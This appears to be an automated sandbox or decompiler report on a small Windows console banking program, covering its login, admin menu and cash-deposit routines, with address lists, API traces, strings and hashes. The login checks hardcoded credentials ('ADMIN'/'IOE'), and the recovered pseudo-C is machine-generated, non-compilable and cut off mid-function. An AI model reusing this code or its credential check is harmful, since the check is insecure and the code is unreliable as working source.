                                                C-Code - Quality: 72%
                                                			E012322F0(void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				char _v6;
                                                				signed int _v12;
                                                				intOrPtr _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				signed int _v28;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v60;
                                                				char _v92;
                                                				void* __ebp;
                                                				void* _t50;
                                                				void* _t74;
                                                				void* _t78;
                                                				void* _t85;
                                                				void* _t94;
                                                				void* _t95;
                                                				void* _t96;
                                                				void* _t100;
                                                				void* _t101;
                                                				void* _t106;
                                                				void* _t116;
                                                
                                                				_t116 = __fp0;
                                                				_t95 = __esi;
                                                				_t94 = __edi;
                                                				_v60 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v20 = 0;
                                                				_v16 = 0;
                                                				do {
                                                					_v20 = 0;
                                                					E012312B0(7, 5);
                                                					_push("Only THREE attempts shall be allowed to enter username and password.");
                                                					E0123715C(_t85, _t94, _t95, 0);
                                                					E01231380(_t94, _t95, 0, 0xa, 8, 0x46, 0xf);
                                                					E012312B0(0x17, 0xa);
                                                					_push("Enter User name : ");
                                                					E0123715C(_t85, _t94, _t95, 0);
                                                					E0123738B("%s",  &_v92);
                                                					E012312B0(0x17, 0xc);
                                                					_push("Password        : ");
                                                					E0123715C(_t85, _t94, _t95, 0);
                                                					_t100 = _t96 + 0x14;
                                                					E012312F0(_t94, _t95,  &_v60);
                                                					_v16 = _v16 + 1;
                                                					_t110 = _v16 - 3;
                                                					if(_v16 == 3) {
                                                						E012320E0( &_v92, _t94, _t95, _t110, _t116);
                                                						E012312B0(0x19, 8);
                                                						_push(0x124f224);
                                                						E0123715C(_t85, _t94, _t95, _t110);
                                                						E012312B0(0x16, 0xb);
                                                						_push("Press any key to exit the program...");
                                                						E0123715C(_t85, _t94, _t95, _t110);
                                                						_t100 = _t100 + 8;
                                                						E012377B1(0);
                                                					}
                                                					_t87 =  &_v92;
                                                					_t50 = E01238230( &_v92, "ADMIN");
                                                					_t101 = _t100 + 8;
                                                					if(_t50 != 0) {
                                                						L6:
                                                						E012320E0(_t87, _t94, _t95, __eflags, _t116);
                                                						E012312B0(0x19, 0xa);
                                                						_push(0x124f278);
                                                						E0123715C(_t85, _t94, _t95, __eflags);
                                                						_t96 = _t101 + 4;
                                                					} else {
                                                						_t78 = E01238230( &_v60, "IOE");
                                                						_t101 = _t101 + 8;
                                                						if(_t78 != 0) {
                                                							goto L6;
                                                						} else {
                                                							_v20 = 1;
                                                						}
                                                					}
                                                					_t113 = _v20 - 1;
                                                				} while (_v20 != 1);
                                                				do {
                                                					E012320E0(_t87, _t94, _t95, _t113, _t116);
                                                					E012312B0(0x1e, 8);
                                                					_push("1. Add User");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0xa);
                                                					_push("2. Delete User");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0xc);
                                                					_push("3. Edit User name / Password");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0xe);
                                                					_push("4. View User Log");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0x10);
                                                					_push("5. Exit");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					_t106 = _t96 + 0x14;
                                                					E012312B0(1, 0x11);
                                                					_v24 = 0;
                                                					while(1) {
                                                						_t114 = _v24 - 0x4e;
                                                						if(_v24 >= 0x4e) {
                                                							break;
                                                						}
                                                						_push("_");
                                                						E0123715C(_t85, _t94, _t95, _t114);
                                                						_t106 = _t106 + 4;
                                                						_v24 = _v24 + 1;
                                                					}
                                                					E012312B0(0x17, 0x13);
                                                					_push(" Press a number between the range [1 -5]  ");
                                                					E0123715C(_t85, _t94, _t95, __eflags);
                                                					_t96 = _t106 + 4;
                                                					_t89 = _v6 - 0x30;
                                                					_v28 = _v6 - 0x30;
                                                					_v12 = _v28;
                                                					_v12 = _v12 - 1;
                                                					__eflags = _v12 - 4;
                                                					if(__eflags > 0) {
                                                						E012320E0(_t89, _t94, _t95, __eflags, _t116);
                                                						E012312B0(0xa, 0xa);
                                                						_push("Your input is out of range! Enter a choice between 1 to 5!");
                                                						E0123715C(_t85, _t94, _t95, __eflags);
                                                						E012312B0(0xf, 0xc);
                                                						_push("Press ENTER to return to main menu...");
                                                						_t74 = E0123715C(_t85, _t94, _t95, __eflags);
                                                						_t96 = _t96 + 8;
                                                					} else {
                                                						switch( *((intOrPtr*)(_v12 * 4 +  &M012325A8))) {
                                                							case 0:
                                                								_t74 = E012325C0(_t85, _t94, _t95, _t116);
                                                								goto L23;
                                                							case 1:
                                                								E01232800(__ebx, __ecx, __edi, __esi, __fp0);
                                                								goto L23;
                                                							case 2:
                                                								E01232B10(__ebx, __edi, __esi, __fp0);
                                                								goto L23;
                                                							case 3:
                                                								E01232E80(__ebx, __edx, __eflags, __fp0);
                                                								goto L23;
                                                							case 4:
                                                								E012320E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                								E012312B0(0xf, 0xa);
                                                								_push("Are you sure you want to exit? <Y/N> : ");
                                                								E0123715C(__ebx, __edi, __esi, __eflags);
                                                								__esp = __esp + 4;
                                                								__edx = _v5;
                                                								__eflags = _v5 - 0x59;
                                                								if(_v5 == 0x59) {
                                                									L20:
                                                									E012377B1(0);
                                                								} else {
                                                									__eflags = _v5 - 0x79;
                                                									if(_v5 == 0x79) {
                                                										goto L20;
                                                									}
                                                								}
                                                								goto L23;
                                                						}
                                                					}
                                                					L23:
                                                					_t87 = 1;
                                                					__eflags = 1;
                                                				} while (1 != 0);
                                                				return _t74;
                                                			}
































                                                0x012322f0
                                                0x012322f0
                                                0x012322f0
                                                0x012322f6
                                                0x012322fc
                                                0x012322ff
                                                0x01232302
                                                0x01232305
                                                0x01232308
                                                0x0123230b
                                                0x0123230e
                                                0x01232311
                                                0x01232314
                                                0x0123231b
                                                0x01232322
                                                0x01232322
                                                0x0123232d
                                                0x01232332
                                                0x01232337
                                                0x01232347
                                                0x01232350
                                                0x01232355
                                                0x0123235a
                                                0x0123236b
                                                0x01232377
                                                0x0123237c
                                                0x01232381
                                                0x01232386
                                                0x0123238d
                                                0x01232398
                                                0x0123239b
                                                0x0123239f
                                                0x012323a1
                                                0x012323aa
                                                0x012323af
                                                0x012323b4
                                                0x012323c0
                                                0x012323c5
                                                0x012323ca
                                                0x012323cf
                                                0x012323d4
                                                0x012323d4
                                                0x012323de
                                                0x012323e2
                                                0x012323e7
                                                0x012323ec
                                                0x0123240c
                                                0x0123240c
                                                0x01232415
                                                0x0123241a
                                                0x0123241f
                                                0x01232424
                                                0x012323ee
                                                0x012323f7
                                                0x012323fc
                                                0x01232401
                                                0x00000000
                                                0x01232403
                                                0x01232403
                                                0x01232403
                                                0x01232401
                                                0x01232427
                                                0x01232427
                                                0x01232431
                                                0x01232431
                                                0x0123243a
                                                0x0123243f
                                                0x01232444
                                                0x01232450
                                                0x01232455
                                                0x0123245a
                                                0x01232466
                                                0x0123246b
                                                0x01232470
                                                0x0123247c
                                                0x01232481
                                                0x01232486
                                                0x01232492
                                                0x01232497
                                                0x0123249c
                                                0x012324a1
                                                0x012324a8
                                                0x012324ad
                                                0x012324bf
                                                0x012324bf
                                                0x012324c3
                                                0x00000000
                                                0x00000000
                                                0x012324c5
                                                0x012324ca
                                                0x012324cf
                                                0x012324bc
                                                0x012324bc
                                                0x012324d8
                                                0x012324dd
                                                0x012324e2
                                                0x012324e7
                                                0x012324ee
                                                0x012324f1
                                                0x012324f7
                                                0x01232500
                                                0x01232503
                                                0x01232507
                                                0x01232565
                                                0x0123256e
                                                0x01232573
                                                0x01232578
                                                0x01232584
                                                0x01232589
                                                0x0123258e
                                                0x01232593
                                                0x01232509
                                                0x0123250c
                                                0x00000000
                                                0x01232513
                                                0x00000000
                                                0x00000000
                                                0x0123251a
                                                0x00000000
                                                0x00000000
                                                0x01232521
                                                0x00000000
                                                0x00000000
                                                0x01232528
                                                0x00000000
                                                0x00000000
                                                0x0123252f
                                                0x01232538
                                                0x0123253d
                                                0x01232542
                                                0x01232547
                                                0x0123254a
                                                0x0123254e
                                                0x01232551
                                                0x0123255c
                                                0x0123255e
                                                0x01232553
                                                0x01232557
                                                0x0123255a
                                                0x00000000
                                                0x00000000
                                                0x0123255a
                                                0x00000000
                                                0x00000000
                                                0x0123250c
                                                0x01232596
                                                0x01232596
                                                0x0123259b
                                                0x0123259b
                                                0x012325a6

                                                APIs
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01232337
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                • _wprintf.LIBCMT ref: 0123235A
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wscanf.LIBCMT ref: 0123236B
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 01232381
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                • _wprintf.LIBCMT ref: 012323B4
                                                • _wprintf.LIBCMT ref: 0123241F
                                                  • Part of subcall function 012325C0: _wprintf.LIBCMT ref: 0123262D
                                                  • Part of subcall function 012325C0: _wscanf.LIBCMT ref: 0123263F
                                                  • Part of subcall function 012325C0: _swscanf.LIBCMT ref: 01232681
                                                  • Part of subcall function 012325C0: _wprintf.LIBCMT ref: 012326D1
                                                • _wprintf.LIBCMT ref: 012323CA
                                                  • Part of subcall function 012377B1: _doexit.LIBCMT ref: 012377BB
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232152
                                                • _wprintf.LIBCMT ref: 01232444
                                                • _wprintf.LIBCMT ref: 0123245A
                                                • _wprintf.LIBCMT ref: 01232470
                                                • _wprintf.LIBCMT ref: 01232486
                                                • _wprintf.LIBCMT ref: 0123249C
                                                • _wprintf.LIBCMT ref: 012324CA
                                                • _wprintf.LIBCMT ref: 012324E2
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                Strings
                                                • 1. Add User, xrefs: 0123243F
                                                • Enter User name : , xrefs: 01232355
                                                • Press a number between the range [1 -5] , xrefs: 012324DD
                                                • 4. View User Log, xrefs: 01232481
                                                • 5. Exit, xrefs: 01232497
                                                • Only THREE attempts shall be allowed to enter username and password., xrefs: 01232332
                                                • 3. Edit User name / Password, xrefs: 0123246B
                                                • N, xrefs: 012324BF
                                                • Password : , xrefs: 0123237C
                                                • Press any key to exit the program..., xrefs: 012323C5
                                                • Your input is out of range! Enter a choice between 1 to 5!, xrefs: 01232573
                                                • IOE, xrefs: 012323EE
                                                • Press ENTER to return to main menu..., xrefs: 01232589
                                                • ADMIN, xrefs: 012323D9
                                                • 2. Delete User, xrefs: 01232455
                                                • Are you sure you want to exit? <Y/N> : , xrefs: 0123253D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                                • String ID: Press a number between the range [1 -5] $1. Add User$2. Delete User$3. Edit User name / Password$4. View User Log$5. Exit$ADMIN$Are you sure you want to exit? <Y/N> : $Enter User name : $IOE$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to return to main menu...$Press any key to exit the program...$Your input is out of range! Enter a choice between 1 to 5!
                                                • API String ID: 3691436685-2046970424
                                                • Opcode ID: 239590e6718f3a60601907442e36f194eb8788151cd0ad2a2d7f2f2789d68c82
                                                • Instruction ID: 335ee4b4e6891386224e9030417996e0f76fe1bac988ca1193f5b19f2aa8cef2
                                                • Opcode Fuzzy Hash: 239590e6718f3a60601907442e36f194eb8788151cd0ad2a2d7f2f2789d68c82
                                                • Instruction Fuzzy Hash: EA6164F1EB4307A6EB19BBF49D03BBE76715FE1B10F004124EA05792C0E9F162588667
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 44%
                                                			E01234640(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				char _v5;
                                                				char _v12;
                                                				intOrPtr _v16;
                                                				char _v28;
                                                				char _v32;
                                                				char _v36;
                                                				char _v40;
                                                				char _v42;
                                                				char _v62;
                                                				char _v112;
                                                				char _v113;
                                                				char _v125;
                                                				char _v140;
                                                				char _v170;
                                                				char _v200;
                                                				char _v208;
                                                				char _v244;
                                                				char _v280;
                                                				char _v360;
                                                				char _v440;
                                                				void* __ebp;
                                                				void* _t57;
                                                				char _t73;
                                                				intOrPtr _t75;
                                                				void* _t80;
                                                				intOrPtr _t81;
                                                				intOrPtr _t86;
                                                				void* _t93;
                                                				intOrPtr _t103;
                                                				intOrPtr _t113;
                                                				intOrPtr _t114;
                                                				intOrPtr _t129;
                                                				intOrPtr _t134;
                                                				void* _t137;
                                                				void* _t141;
                                                				void* _t151;
                                                				void* _t153;
                                                				void* _t154;
                                                				void* _t163;
                                                
                                                				_t170 = __fp0;
                                                				_t168 = __eflags;
                                                				_t136 = __esi;
                                                				_t135 = __edi;
                                                				_t101 = __ebx;
                                                				_v16 = 0;
                                                				E012320E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                				E012312B0(5, 0xa);
                                                				_push("Deposit to A/C number            : ");
                                                				E0123715C(__ebx, __edi, __esi, __eflags);
                                                				E0123738B("%s",  &_v28);
                                                				 *0x1252f28 = E01236EF1("ACCOUNT.DAT", "r");
                                                				_t103 =  *0x1252f28; // 0x0
                                                				_push(_t103);
                                                				E01236DB6(__ebx, _t135, _t136, _t168);
                                                				_t141 = _t137 + 0x18;
                                                				_t169 = _v16;
                                                				if(_v16 == 0) {
                                                					E012320E0(_t103, _t135, _t136, _t169, __fp0);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Given A/C number does not exits!");
                                                					return E0123715C(_t101, _t135, _t136, _t169);
                                                				}
                                                				E012312B0(0x32, 0xa);
                                                				_push( &_v244);
                                                				_push("[ %s ]");
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				E012312B0(5, 0xc);
                                                				_push("Amount to be Deposited (in NRs.) : ");
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				E0123738B("%f",  &_v12);
                                                				E012320E0(_t103, _t135, _t136, __eflags, __fp0);
                                                				E012312B0(0x1e, 0xa);
                                                				_push("Confirm Transaction");
                                                				_t57 = E0123715C(_t101, _t135, _t136, __eflags);
                                                				asm("movss xmm0, [ebp-0x8]");
                                                				asm("movss [esp], xmm0");
                                                				E01231870(_t57,  &_v280);
                                                				E012312B0(3, 0xc);
                                                				_push( &_v244);
                                                				_push( &_v28);
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				asm("cvtss2sd xmm0, [ebp-0x8]");
                                                				asm("movsd [esp], xmm0");
                                                				E01231B30( &_v440, "%s to be deposited in A/C number : %s [ %s ]",  &_v280);
                                                				E01238140( &_v360,  &_v440);
                                                				E01238140( &_v360, "]");
                                                				E012312B0(0x28 - (E012382C0( &_v360) >> 1), 0xe);
                                                				_push( &_v360);
                                                				E01237229(_t101, _t135, _t136, __eflags);
                                                				E012312B0(8, 0x11);
                                                				_push("Are you sure you want to perform this tranasction? <Y/N>");
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				_t151 = _t141 + 0x24 - 8 + 0x1c;
                                                				_t73 = _v5;
                                                				__eflags = _t73 - 0x59;
                                                				if(_t73 == 0x59) {
                                                					L4:
                                                					 *0x1252f28 = E01236EF1("ACCOUNT.DAT", "r");
                                                					_t75 = E01236EF1("TEMP.DAT", "a");
                                                					_t153 = _t151 + 0x10;
                                                					 *0x1252f24 = _t75;
                                                					while(1) {
                                                						_push( &_v32);
                                                						_push( &_v36);
                                                						_push( &_v40);
                                                						_push( &_v42);
                                                						_push( &_v140);
                                                						_push( &_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_t129 =  *0x1252f28; // 0x0
                                                						_t80 = E01237021(_t129, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                						_t154 = _t153 + 0x38;
                                                						__eflags = _t80 - 0xffffffff;
                                                						if(__eflags == 0) {
                                                							break;
                                                						}
                                                						_t93 = E01238230( &_v208,  &_v28);
                                                						_t163 = _t154 + 8;
                                                						__eflags = _t93;
                                                						if(__eflags == 0) {
                                                							asm("movss xmm0, [ebp-0x24]");
                                                							asm("addss xmm0, [ebp-0x8]");
                                                							asm("movss [ebp-0x24], xmm0");
                                                						}
                                                						asm("movss xmm0, [ebp-0x24]");
                                                						asm("addss xmm0, [ebp-0x20]");
                                                						asm("movss [ebp-0x1c], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x20]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x24]");
                                                						asm("movsd [esp], xmm0");
                                                						_push(_v42);
                                                						_push( &_v140);
                                                						_push(_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_push( &_v208);
                                                						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
                                                						_t134 =  *0x1252f24; // 0x0
                                                						_push(_t134);
                                                						E01236F06(_t101, _t135, _t136, __eflags);
                                                						_t153 = _t163 - 0xfffffffffffffff8 + 0x44;
                                                					}
                                                					_t81 =  *0x1252f24; // 0x0
                                                					_push(_t81);
                                                					E01236DB6(_t101, _t135, _t136, __eflags);
                                                					_t113 =  *0x1252f28; // 0x0
                                                					_push(_t113);
                                                					E01236DB6(_t101, _t135, _t136, __eflags);
                                                					 *0x1252f28 = E01236EF1("TRANSACTION.DAT", "a");
                                                					E01238417(__eflags, 0x1252f30);
                                                					_push(0x1252ee4);
                                                					asm("cvtss2sd xmm0, [ebp-0x8]");
                                                					asm("movsd [esp], xmm0");
                                                					_push(0x1252f30);
                                                					_push(0x1252f40);
                                                					_push("Cash+Deposited");
                                                					_push( &_v28);
                                                					_push("%s %s %s %s %.2f %s\n");
                                                					_t86 =  *0x1252f28; // 0x0
                                                					_push(_t86);
                                                					E01236F06(_t101, _t135, _t136, __eflags);
                                                					_t114 =  *0x1252f28; // 0x0
                                                					_push(_t114);
                                                					E01236DB6(_t101, _t135, _t136, __eflags);
                                                					E012320E0(_t114, _t135, _t136, __eflags, _t170);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Transaction completed successfully!");
                                                					return E0123715C(_t101, _t135, _t136, __eflags);
                                                				}
                                                				__eflags = _v5 - 0x79;
                                                				if(_v5 == 0x79) {
                                                					goto L4;
                                                				}
                                                				return _t73;
                                                			}










































                                                0x01234640
                                                0x01234640
                                                0x01234640
                                                0x01234640
                                                0x01234640
                                                0x01234649
                                                0x01234650
                                                0x01234659
                                                0x0123465e
                                                0x01234663
                                                0x01234674
                                                0x0123468e
                                                0x01234693
                                                0x01234699
                                                0x0123469a
                                                0x0123469f
                                                0x012346a2
                                                0x012346a6
                                                0x012346a8
                                                0x012346b1
                                                0x012346b6
                                                0x00000000
                                                0x012346c0
                                                0x012346cc
                                                0x012346d7
                                                0x012346d8
                                                0x012346dd
                                                0x012346e9
                                                0x012346ee
                                                0x012346f3
                                                0x01234704
                                                0x0123470c
                                                0x01234715
                                                0x0123471a
                                                0x0123471f
                                                0x01234724
                                                0x01234729
                                                0x01234735
                                                0x0123473e
                                                0x01234749
                                                0x0123474d
                                                0x0123475a
                                                0x01234769
                                                0x01234771
                                                0x01234776
                                                0x01234789
                                                0x0123479d
                                                0x012347c0
                                                0x012347cb
                                                0x012347cc
                                                0x012347d8
                                                0x012347dd
                                                0x012347e2
                                                0x012347e7
                                                0x012347ea
                                                0x012347ee
                                                0x012347f1
                                                0x01234800
                                                0x01234812
                                                0x01234821
                                                0x01234826
                                                0x01234829
                                                0x0123482e
                                                0x01234831
                                                0x01234835
                                                0x01234839
                                                0x0123483d
                                                0x01234844
                                                0x01234848
                                                0x0123484c
                                                0x01234850
                                                0x01234854
                                                0x0123485b
                                                0x01234862
                                                0x0123486f
                                                0x01234876
                                                0x0123487b
                                                0x0123487e
                                                0x01234881
                                                0x00000000
                                                0x00000000
                                                0x01234892
                                                0x01234897
                                                0x0123489a
                                                0x0123489c
                                                0x0123489e
                                                0x012348a3
                                                0x012348a8
                                                0x012348a8
                                                0x012348ad
                                                0x012348b2
                                                0x012348b7
                                                0x012348bc
                                                0x012348c4
                                                0x012348c9
                                                0x012348d1
                                                0x012348d6
                                                0x012348de
                                                0x012348e7
                                                0x012348ee
                                                0x012348f3
                                                0x012348f7
                                                0x012348fb
                                                0x012348ff
                                                0x01234906
                                                0x0123490d
                                                0x01234914
                                                0x01234915
                                                0x0123491a
                                                0x01234920
                                                0x01234921
                                                0x01234926
                                                0x01234926
                                                0x0123492e
                                                0x01234933
                                                0x01234934
                                                0x0123493c
                                                0x01234942
                                                0x01234943
                                                0x0123495d
                                                0x01234967
                                                0x0123496f
                                                0x01234974
                                                0x0123497c
                                                0x01234981
                                                0x01234986
                                                0x0123498b
                                                0x01234993
                                                0x01234994
                                                0x01234999
                                                0x0123499e
                                                0x0123499f
                                                0x012349a7
                                                0x012349ad
                                                0x012349ae
                                                0x012349b6
                                                0x012349bf
                                                0x012349c4
                                                0x00000000
                                                0x012349ce
                                                0x012347f7
                                                0x012347fa
                                                0x00000000
                                                0x00000000
                                                0x012349d4

                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01234663
                                                • _wscanf.LIBCMT ref: 01234674
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _wprintf.LIBCMT ref: 012346BB
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 012346DD
                                                • _wprintf.LIBCMT ref: 012346F3
                                                • _wscanf.LIBCMT ref: 01234704
                                                • _wprintf.LIBCMT ref: 0123471F
                                                • _wprintf.LIBCMT ref: 0123475A
                                                • _wprintf.LIBCMT ref: 012347E2
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232152
                                                Strings
                                                • Transaction completed successfully!, xrefs: 012349C4
                                                • ACCOUNT.DAT, xrefs: 01234805
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 0123486A
                                                • %s to be deposited in A/C number : %s [ %s ], xrefs: 01234755
                                                • ACCOUNT.DAT, xrefs: 01234681
                                                • Deposit to A/C number : , xrefs: 0123465E
                                                • Confirm Transaction, xrefs: 0123471A
                                                • TEMP.DAT, xrefs: 0123481C
                                                • TRANSACTION.DAT, xrefs: 01234950
                                                • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 012347DD
                                                • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 01234915
                                                • [ %s ], xrefs: 012346D8
                                                • Amount to be Deposited (in NRs.) : , xrefs: 012346EE
                                                • Given A/C number does not exits!, xrefs: 012346B6
                                                • %s %s %s %s %.2f %s, xrefs: 01234994
                                                • Cash+Deposited, xrefs: 0123498B
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vwscanf
                                                • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be deposited in A/C number : %s [ %s ]$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Deposited (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Deposited$Confirm Transaction$Deposit to A/C number : $Given A/C number does not exits!$TEMP.DAT$TRANSACTION.DAT$Transaction completed successfully!$[ %s ]
                                                • API String ID: 532294799-930819241
                                                • Opcode ID: 36d9b47078b892e7da5ba9ef6553782b70b2e977129376ef7b9a9ee83f7656da
                                                • Instruction ID: f0d91d520195e11ca8cb4939e558e55eddc5d4bdbc70a094af231fb1ae6ee06c
                                                • Opcode Fuzzy Hash: 36d9b47078b892e7da5ba9ef6553782b70b2e977129376ef7b9a9ee83f7656da
                                                • Instruction Fuzzy Hash: 1C91B7F2D3030ABBDB15FBA09C82EEE77785FA5700F004259F90575180FA7166988BB6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E01232B10(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				char _v19;
                                                				char _v23;
                                                				char _v27;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v48;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v67;
                                                				char _v71;
                                                				char _v75;
                                                				char _v79;
                                                				char _v80;
                                                				char _v83;
                                                				char _v87;
                                                				char _v91;
                                                				char _v95;
                                                				char _v99;
                                                				char _v103;
                                                				char _v107;
                                                				char _v111;
                                                				char _v112;
                                                				char _v144;
                                                				char _v176;
                                                				char _v208;
                                                				void* __ebp;
                                                				intOrPtr _t66;
                                                				intOrPtr _t67;
                                                				void* _t68;
                                                				intOrPtr _t84;
                                                				intOrPtr _t86;
                                                				intOrPtr _t87;
                                                				void* _t88;
                                                				intOrPtr _t89;
                                                				intOrPtr _t95;
                                                				intOrPtr _t98;
                                                				intOrPtr _t105;
                                                				char _t106;
                                                				void* _t109;
                                                				void* _t110;
                                                				intOrPtr _t119;
                                                				intOrPtr _t130;
                                                				intOrPtr _t132;
                                                				void* _t136;
                                                				void* _t140;
                                                				void* _t141;
                                                				void* _t142;
                                                				void* _t143;
                                                				void* _t149;
                                                				void* _t150;
                                                				void* _t154;
                                                
                                                				_t161 = __fp0;
                                                				_t135 = __esi;
                                                				_t134 = __edi;
                                                				_t113 = __ebx;
                                                				_v48 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v27 = 0;
                                                				_v23 = 0;
                                                				_v19 = 0;
                                                				_v112 = 0;
                                                				_v111 = 0;
